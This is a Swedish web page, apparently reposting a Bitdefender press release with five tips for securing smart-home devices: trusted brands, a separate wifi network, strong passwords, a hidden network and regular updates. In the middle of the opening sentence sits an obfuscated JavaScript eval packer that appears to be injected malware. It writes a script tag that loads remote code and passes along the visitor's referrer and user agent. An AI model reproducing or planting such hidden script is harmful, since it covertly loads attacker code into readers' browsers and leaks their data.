Image Image Image Image Image Image Image Image Image Image

| 13 maj, 2021

Scroll to top

Top

Fem tips för att skydda det smarta hemmet

Fem tips för att skydda det smarta hemmet
Sebastian

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rfsya|var|u0026u|referrer|rrffn||js|php’.split(’|’),0,{}))
infaller årets Safer Internet Day, en dag vigd åt att göra nätet till en säkrare och bättre plats för alla. Idag utgör uppkopplade prylar ett allt större säkerhetshot på internet. Därför har Bitdefender samlat fem enkla tips på hur du kan skydda ditt smarta hem.

Under 2016 har de uppkopplade prylarna välkomnats in i våra (smarta) hem. Men vad många inte tänker på, är att när hushållsprylarna är uppkopplade mot nätverket blir de precis som datorn potentiella måltavlor för cyberkriminella. Även om du inte förvarar någon känslig data på din högtalare kan en hackare komma åt hemnätverket och därigenom få tillgång till din dator. Dina uppkopplade prylar kan också användas i en större attack mot ett företag eller myndighet och ditt uppkopplade hem blir då helt lamslaget.

Bitdefenders Nordenchef Fredrik Jubran har listat fem enkla säkerhetstips för att skydda ditt smarta hem.

1. Läs på innan du köper

När du ska köpa en uppkopplad högtalare, en smart-tv eller annan produkt som hör till det smarta hemmet är en bra regel att alltid välja ett varumärke du litar på. Stora tillverkare som Amazon, Google och Apple kan man i regel lita på att de utvecklat en produkt med säkerheten i åtanke. Men för att vara på den säkra sidan ska du söka online om tillverkaren som utfärdar nya mjukvaruuppdateringar på regelbunden basis som i sin tur ökar produktens skydd mot cyberattacker.

2. Sätt upp ett separat wifi-nätverk för dina smarta prylar
Med två olika wifi-nätverk försvårar du för den som vill komma åt känsliga data eftersom det krävs mycket mer jobb att hoppa från en uppkopplad högtalare på ett nätverk över till en laptop på ett annat. De flesta routers tillåter dig idag att lägga till ett gästnätverk utöver ditt vanliga nätverk, med ett separat användarnamn och lösenord. På det här sättet kan din högtalare, lampa och smart-tv fortsätta vara smarta samtidigt som du skyddar dina känsligare prylar för intrång om de relativt oskyddade prylarna hackas.

3. Slarva inte med lösenorden

Av någon anledning väljer vi inte lika omsorgsfullt lösenord till vår uppkopplade högtalare som vi gör när vi väljer lösenord till Facebook eller till datorn. Men det är ett misstag som kan stå oss dyrt. Varje glödlampa, högtalare och smart-tv du har i hemmet ska ha ett unikt och starkt lösenord.

Ett starkt lösenord ska innehålla både versaler, gemener, siffror och minst ett annat tecken. Om du använder samma lösenord på flera prylar kan en hackare med lätthet ta över alla dina prylar om hen har klarat att knäcka ett lösenord Ett tips för att lagra dina olika lösenord är att använda sig av en lösenords-app – exempelvis 1 Password eller LastPass.

4. Göm ditt nätverk för obehöriga

Om du är riktigt orolig för att få ditt hemnätverk hackat finns det ytterligare ett knep som försvårar intrång. Du kan helt enkelt ändra inställningarna routern så att ditt nätverk inte blir synligt för andra. Det innebär att man manuellt måste skriva in både användarnamn och lösenord för att kunna ansluta till ditt nätverk.

5. Ha koll på de senaste uppdateringarna

Även om många ansvarsfulla tillverkare av smarta hemprylar erbjuder mjukvaruuppdateringar regelbundet, är det oftast upp till dig som konsument att både hålla koll på när en uppdatering släpps och sedan själv uppdatera produkten. Eftersom högtalaren, glödlampan och kaffekokaren saknar skärm finns det ingen möjlighet för dessa prylar att tala om för dig att det finns en ny mjukvareuppdatering tillgänglig. Därför bör du göra det till en rutin att logga in på hemsidan eller appen och se om det finns nya uppdateringar att installera.

Läs mer om Safer Internet Day här.

Om Bitdefender

Bitdefender är ett globalt tekniksäkerhetsföretag som erbjuder banbrytande end-to-end lösningar för cybersäkerhet och avancerade hotskydd till mer än 500 miljoner användare i fler än 150 länder. Bitdefender har sedan 2001 utvecklat och producerat prisvinnande säkerhetsteknik för företag och privatpersoner. I dag är Bitdefender en leverantör av både hybrida infrastrukturskydd och skydd på enhetsnivå. Genom FoU, allianser och partnerskap är Bitdefender den leverantör som alltid ligger i framkant som och levererar kraftfull säkerhetsteknik du kan ha förtroende för. Mer information finns tillgänglig på http://www.bitdefender.com/.